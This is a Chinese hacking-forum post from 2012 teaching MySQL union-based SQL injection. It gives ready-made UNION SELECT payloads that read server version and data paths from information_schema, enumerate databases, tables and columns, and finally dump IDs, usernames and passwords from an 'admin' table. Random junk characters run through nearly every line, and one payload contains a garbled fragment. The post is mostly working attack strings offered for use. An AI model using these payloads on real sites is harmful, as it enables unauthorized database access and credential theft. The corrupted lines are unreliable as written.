找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1968|回复: 0
打印 上一主题 下一主题

mysql常规注入

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:48:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
本文介绍MYSQL盲注的一些语句和方法( s" u# G1 c9 r- Q+ |4 F: f) d
& n1 }! z/ r; S- y9 K5 w: H0 G. o' g0 t
学习盲注前先了解下 IFORMATION_SCHEMA 库# `. a8 R0 D7 R6 L7 J, W% p
9 p  T% |) F: B# |6 i
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库,其中记录了Mysql中所有& |0 ^' j0 Q+ }
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说明。
- }/ F( [3 z, B1.得到所有数据库名:/ Y# d% ]8 c: g3 n
|SCHEMATA ->存储数据库名的表
# t3 L9 g- n8 c0 r8 S. S! [|---字段:SCHEMA_NAME ->数据库名称
! F1 u6 g; m4 u' ]* c7 B: m# K5 l3 f6 }
|TABLES ->存储表名* M0 ^, `4 A  f
|---字段:TABLE_SCHEMA ->表示该表名属于哪个数据库名
# ]) X; ^" _6 F. V- m% Q% j|---字段:TABLE_NAME ->存储表的表名; v$ g5 d5 a4 p$ S: r: C* e0 x) V

+ X# M( p! D3 |5 ?2 D" u, p4 I  V|COLUMNS ->存储的字段名表  y7 z) X3 R8 N7 O' r
|---字段:TABLE_SCHEMA ->该字段所属数据库名3 p8 [( j# J' i2 o8 _. F7 M5 U/ h
|---字段:TABLE_NAME ->存储所属表的名称
0 h/ ]1 _$ c, d$ P  b% e1 i6 L2 t2 t! c0 m+ B( |) B
|---字段:COLUMN_NAME ->该字段的名称: x  r  G) a& X1 s. a& D8 u
9 V1 e, z& S; \/ V. u8 }, k
( b. y! R% c6 Y: t5 J

1 m. r6 s- l% ?+ f- f/ x###########################################################################9 z0 D  V' g/ k0 ~& C8 K

. g, T, _$ P7 O0 ?0x001 获取系统信息:2 T1 f. r, e2 N9 X4 ^8 R/ t' a
8 w3 S' r6 k! K- [' I% Z
union select 1,2,3,4,5,concat(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
/ O1 f# s" s* E9 ]% E+ g
8 i) ?6 z- q/ m' o( p. ~/** z  _6 w/ }3 P6 R- Q

  X5 a6 x! J' K6 k+ }" N@@global.version_compile_os 获取系统版本6 I* F" N2 h3 M
7 _" M+ _( A; I
@@datadir 数据库路径
- a9 w. H& Y0 ^8 N0 Udatabase() 当前数据库名称7 E$ h/ u( m# M1 B( Y
0x3c62723e 换行HEX值  [# J! A  C* F: t/ Y( D
  @0 D" _5 [( g
*/
1 V0 I* z! u6 h& `9 V' c1 }* J# Q/ e: `) h7 h6 c4 ~3 |% Y
& H' b& X2 i. x* `; i# [2 m

. q$ }" E, Q/ e  T+ I3 N######################################################################: c$ }: O) f2 J7 g; X

; x& ]. Z" o6 A# d, s; R0x002 获取表名6 o1 u5 T* A# X! U$ b

8 H7 @7 m4 D$ b, Y7 W$ D6 a/ d+ O3 _union select 1,2,group_concat(table_name),4,5,6,7,8,9 from information_schema.tables where table_schema=0x67617264656e /*
) @9 @$ Q5 [1 E" L- G% s; ^' _+ c) d, ~1 h$ S8 h6 z
$ C! \- Q4 S& o) Z& ?  ^7 e& ]0 m& m

  v. E+ O1 e# y1 B# N+ B/*
" X" x$ j+ A$ k1 @) k2 b( V; M8 M9 L5 m% ]9 w- l) X2 q" V9 k
0x67617264656e 为当前数据库名
3 m6 B3 H, |$ `# _  N
' ?' F" G% n8 p$ F: u, s( O" @group_concat(table_name) 使用group_concat函数 一步获得该库所有表名& Y2 R- S/ q4 b
) F3 s- F6 Y2 H
*/
9 O$ Z1 s) ]- X+ j+ ?/ E' M+ L( p; t9 Z4 ~! a7 b: e$ I
######################################################################
" S8 L, j9 P+ a* C/ U# L% R4 p7 K+ z6 d7 z& R
0 t, G2 R. I7 w5 [+ k4 V0 N

( f9 _' \( D. b' h1 r0x003 获取字段
' Q" ^/ n5 c& P4 q: ~) ]
- ~) P0 D( H1 C! \" h% k% x2 i7 dunion select 1,2,group_concat(column_name),4,5,6,7,8,9 from information_schema.columns where table_name=0x61646d696e and table_schema=0x67617264656e limit 1 /*% t' `& K7 H# }$ y! A# S" @
& Y1 y" ^' a8 @2 R) k
/*
, @' v- K' U3 I' K( V! t) Z2 y# `% h* b+ M. b! L& \& h
group_concat(column_name) 同样是 一口气 获得该表(0x61646d696e)所有字段
4 h/ P7 t4 F$ ~8 c8 P6 b+ {9 r
1 `- W- Y; @/ K3 u: @% W. I0x61646d696e ->选择一个表
, U- K- P' u* H4 \) U4 z$ e8 {. ^: w) O
0x67617264656e ->数据库名9 `: ^9 O9 R5 ?; y0 q

1 \/ G2 N$ t/ m, U! X*/- K/ I' M1 U3 U" A) X

3 _. M( D5 M, J9 }6 G+ h#####################################################################8 E4 ]* l4 ^; E' a% N
8 Y+ m2 Z  U- p5 G

2 }5 U- g5 p; l# N& L* _; E5 V  }( f$ d* }- @! k: K8 o; _2 R* H
0x004 获取数据5 u7 u, ^. r% o2 W& f# n9 C5 A
( A; v' x9 m/ Q  h, ?5 T
union select 1,2,3( r* W' V, U# \& {: {
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin4 d* S& o) ^# Q- ^/ X1 q

5 S9 z" m2 |1 p1 V: cunion select 1,group_concat(id),group_concat(adname),4,5,group_concat(adpassword),6,7,8 from admin
1 P( Q, s) y4 u2 j4 Z  k
5 g/ Z  V2 q9 ~ ; \5 a" T; A7 h- C$ O( K

) K* N, K# v" A/*2 l2 ?% T2 S" d% Z) K* A! w+ `

5 B8 K4 ]1 G: K) g( U0x3c62723e 换行符号HEX编码
& a. x& X9 T( `+ f6 {8 J
" X  u( A) d; h- m: cgroup_concat 同时获得该字段所有数据
  o5 L% p+ g5 v3 R5 T3 d. i2 G
7 U5 B2 w+ K1 J5 H. X) I; U6 x*/
) M$ B5 [/ b8 L! E
4 D* m" ?5 b. V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表